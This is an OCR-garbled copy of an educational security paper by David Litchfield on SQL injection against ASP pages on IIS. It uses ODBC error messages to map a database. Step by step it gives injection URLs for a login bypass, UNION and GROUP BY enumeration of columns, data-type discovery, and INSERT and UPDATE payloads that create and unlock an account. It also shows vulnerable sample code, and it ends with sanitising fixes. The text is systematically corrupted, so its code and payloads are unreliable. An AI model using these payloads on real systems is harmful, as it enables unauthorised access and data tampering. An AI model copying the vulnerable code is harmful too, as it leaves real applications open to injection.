Web Application Disassembly with ODBC Error Messages

By David Litchfield Director of Sec rity Architect re !sta"e http#$$www%atsta"e%com &ntrod ction This document describes how to subvert the security of a Microsoft Internet Information Web Server that feeds into a SQL database. The document assumes that the web application uses Active Server Pa es technolo y with Active !ata "b#ects $A!"%& thou h the same techni'ues can be used with other technolo ies. The techni'ues discussed here can be used to disassemble the SQL database(s structure& by) pass lo in pa es& and retrieve and modify data. This does assume that attac*ers can run arbitrary SQL 'ueries& which unfortunately is all too common due to a lac* of understandin & or even a complete i norance of this problem and subse'uent codin techni'ues in an ASP pa e. +or e,ample ) consider the followin ASP code ) from a lo in pa e./0 LA123A245678S9:IPT6 /; ./ !im o9"1v& o:Su Set o9"1v 5 Server.9reate"b#ect$6A!"!8.9onnection6% o9"1v."pen 6!:I74:5<SQL Server=>S4:74:5aeneas>3I!5sa>PW!5>!ATA8AS45paper6 Set o:Su 5 o9"1v.4,ecute$6S4L49T ? +:"M tbl3sers W@4:4 username 5 (6 A :e'uest.Querystrin $63serI!6% A 6( A1! password 5 (6 A :e'uest.Querystrin $6Password6% A 6(6% if not o:Su.4"+ then Session$63serI!6% 5 o:Su $6username6% :esponse.:edirect 6lo insucceeded.asp6 else :esponse.:edirect 6lo infailed.asp6 end if /; There are several problems with this pa e but before ettin to those e,amine how it wor*s. The client enters a user I! and password& which are passed into an SQL 'uery& which is then e,ecuted. If the user I! and password e,ist in the tbl3sers the SQL server(s response& *nown as a recordset& would be populated. If the user I! andBor password do not e,ist then the recordset would not be populated. The ASP code then chec*s to see if it has and redirects the user to lo insucceeded.asp and if the recordset has not been populated the user is redirected to lo infailed.asp. As was already stated there are several problems with this ASP pa e ) there(s an SQL lo in and password embedded in the code& that SQL lo in happens to be the most powerful account in the database and its password is still the default blan*. As far as the codin is concerned thou h it is e,tremely dan erous- due to the fact that user supplied I! and password are bein passed strai ht into the SQL 'uery with out first bein sanitised it ives an attac*er bypass this lo in pa e. All she would need to do is populate the record set and to do this& without *nowin a valid user I! and password is ma*e the followin re'uesthttp-BBserverBlo in.aspCuserid5(/DEor/DEF5F)) :ather than e,ecutin the SQL 'uery the server was supposed to i.e. S4L49T ? +:"M tbl3sers W@4:4 username 5 (foo( A1! password 5 (bar( it e,ecuted

S4L49T ? +:"M tbl3sers W@4:4 username 5 (( or F5F)) !ue to the 6or6 condition in this 'uery always evaluatin to true the recordset would be populated and the attac*er would be lo ed in. The reason that the SQL 'uery has been so drastically modified is because of the sin le 'uote mar* in the parameter. In SQL 'ueries strin s are delimited by sin le 'uotes. Tac*in on a )) on the end of the 'uery stops SQL complainin about unclosed 'uote mar*s. This pa e is easy to by)pass usin this 6or6 techni'ue. E'tended &ntrod ction If this code was modified however such that an 3P!AT4 occurred after to set& say& audit information this 6or6 techni'ue would fail./ !im o9"1v& o:Su Set o9"1v 5 Server.9reate"b#ect$6A!"!8.9onnection6% o9"1v."pen 6!:I74:5<SQL Server=>S4:74:5aeneas>3I!5sa>PW!5>!ATA8AS45paper6 Set o:Su 5 o9"1v.4,ecute$6S4L49T ? +:"M tbl3sers W@4:4 username 5 (6 A :e'uest.Querystrin $63serI!6% A 6( A1! password 5 (6 A :e'uest.Querystrin $6Password6% A 6(6% if not o:Su.4"+ then Session$63serI!6% 5 o:Su $6username6% Set o:Su 5 o9"1v.4,ecute$6e,ec spGaudit (6 A :e'uest.Querystrin $63serI!6% A 6(6% :esponse.:edirect 6lo insucceeded.asp6 else :esponse.:edirect 6lo infailed.asp6 end if /; As can be seen the code now has an 6e,ec spGaudit6 'uery so when the same re'uest is made usin the 6or6 techni'ue the server produces an errorMicrosoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect synt ! ne r t"e #ey$ord 'or'% &'o(in% s)* 'ine 11 The reason this error occurs is because SQL 'ueries that e,ecute a stored procedure can(t be conditional and the presence of 6or6 ma*es it so. At this point the lo in has failed and assumin the attac*er does not have access the source of the ASP code& how can this lo in screen by by)passedC Down to b siness To do this the web application needs to be disassembled and this is done by usin "!89 error messa es. The attac*er would start by re'uestin http-BBFDH.E.E.FBlo in.aspCuserid5aaa( 1ote the sin le 'uote at the end the end of this 3:L. This will produce the followin error messa eMicrosoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]+nc'osed ,-ot tion . r# /efore t"e c" r cter strin( ' ' 01D ) ss$ord 2 ''% &'o(in% s)* 'ine 3 What this has done is iven the attac*er a fra ment of the 'uery embedded in the ASP pa e ) 6 A1! password 56. This also informs the attac*er that one of the columns in the table is called 6password6. With *nowled e of this it is now possible to enumerate the structure of the table where the user credentials are stored& learnin its name and the name of every column in that table. They would do this by ma*in the followin re'uesthttp-BBFDH.E.E.FBlo in.aspCuserid5ddd(/DE roup/DEby/DE$password%)) This would produce the followin error messa eMicrosoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Co'-.n 't/'+sers%-sern .e' is inv 'id in t"e se'ect 'ist /ec -se it is not cont ined in eit"er n ((re( te f-nction or t"e 45O+P B6 c' -se% &'o(in% s)* 'ine 3 As can be seethe attac*er now has the table(s name ) tbl3sers and the name of another column in this table ) username. They would then re'uesthttp-BBFDH.E.E.FBlo in.aspCuserid5aaa(/DE roup/DEby/DE$username%)) producin Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Co'-.n 't/'+sers%' st'o((edin' is inv 'id in t"e se'ect 'ist /ec -se it is not cont ined in eit"er n ((re( te f-nction or t"e 45O+P B6 c' -se% &'o(in% s)* 'ine 3 1ow the attac*er has a third column name. They would *eep repeatin this process of substitutin column names in a 6 roup by6 3:L to step throu h the table enumeratin all of the columns. 8ut when would they *now that all column names have been successfully enumeratedC Assumin that the ASP code performs a 6S4L49T ? ...6 then by usin 31I"1 the attac*er could then wor* out the number of columns in the tbl3sers table. http-BBFDH.E.E.FBlo in.aspCuserid5aaa(/DEunion/DEselect/DEusername/DEfrom/DEtblusers)) This re'uest would produce this error Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]0'' ,-eries in n SQL st te.ent cont inin( +1IO1 o)er tor .-st " ve n e,- ' n-./er of e!)ressions in t"eir t r(et 'ists% &'o(in% s)* 'ine 3 The attac*er would then *eep addin another username to the 3:L http-BBFDH.E.E.FBlo in.aspCuserid5aaa(/DEunion/DEselect/DEusername&username/DEfrom/DEtblusers)) until this error messa e stopped. At this point countin the number of usernames in the re'uest would ive the number of columns that e,ist in the tbl3sers table. "nce a list of all the column names has been retrieved the attac*er would then need to wor* out what data

type the column e,pected. To do this the 9"MP3T4 clause would be used providin each column name as an ar umenthttp-BBFDH.E.E.FBlo in.aspCuserid5aaa(/DEcompute/DEsum$username%)) producin the error Microsoft OLE DB Provider for ODBC Drivers error '80040e03' [Microsoft][ODBC SQL Server Driver][SQL Server]7"e s-. or ver (e ((re( te o)er tion c nnot t #e nv rc" r d t ty)e s n r(-.ent% &'o(in% s)* 'ine 3 As can be seen 6username6 is of data type nvarchar. "nce this has been performed the attac*er would then *now the name of the table& each of the column(s name in the table& and their respective e,pected data type. These three details are crucial if the attac*er wished to I1S4:T into or 3P!AT4 the table and to by)pass the lo in pa e these will be needed. The attac*er would then set about creatin their own account usin an I1S4:T 'ueryhttp-BBFDH.E.E.FBlo in.aspCuserid5aaa( insert into tblusers$username&password&lastlo edin&status% values $(#smith(&(secret(&("ct IF DEEE J-KDPM(&(foo(%)) :e'uestin this would not produce an error ) to see if it was successful however& the attac*er would #ust attempt to lo on with a username of 6#smith6 and a password of 6secret6. They may be successful. @owever& ima ine that they received a messa e statin that their account was loc*ed out. 1otice in the above 3:L $/DEs stripped out for clarity(s sa*e% that one of the columns is called 6status6 ) and the value 6foo6 was inserted. It would be a fair assumption to say that if the account were loc*ed out this 6status6 column would hold the information about this. The attac*er would need to set this value to what the application e,pects for it to consider the account not to be loc*ed out. 8ut how would the attac*er *now what to insert in this fieldC They wouldn(t but if they could update it with the value of another user(s value then this should ive the application what it e,pects for the account not to be loc*ed out. The difficulty with this is retrievin a results set with only one row. This can be done however usin a re ate functions ) MI1 and MAL. A re'uest would be made similar to http-BBFDH.E.E.FBlo in.aspCuserid5aaa( 3P!AT4 tblusers S4T status 5 $select min$status% from tblusers% where username 5 (#smith( This 'uery would produce one row in the recordset and update #smith(s 6status6 with the row that on evaluation produced the smallest value. All oin accordin to plan the attac*er has now by)passed the lo in pa e. S mmary "bviously the techni'ues described here could be used not #ust for by)passin lo in pa es but also for enumeratin the database tables so that data could be returned with 'uery usin the 31I"1 operator ) they bypass the issue that callin a 6select ? from sysob#ects6 as a second 'uery would not have the results returned in the recordset and printed bac* to the client(s screen. (he fi' All of this would 6 o away6 if the ASP coder properly sanitised user input before lettin it anywhere near an SQL 'uery. !ependin upon whether the input is a strin or a number different methods are used.

+or strin s the replace() function can be used. :eplace$:e'uest.Querystrin $6foobar6%& 6(6& 6(6% This would replace an occurrence of a sin le 'uote with nothin ) effectively strippin them out. In cases where there needed to be a sin le 'uote& thou h& say in a name li*e 6"(Malley6 or a user wishes to have a sin le 'uote in their password however the fi, would be :eplace$:e'uest.Querystrin $6foobar6%& 6(6& 6( (6% replacin a sin le 'uote with a two sin le 'uotes ) the way to escape sin le 'uotes in SQL. If the input in 'uestion is numeric then usin 9Int will produce an error if the input is not a number. Alternatively it is possible to use Is1umeric$% or in #script Is1a1$%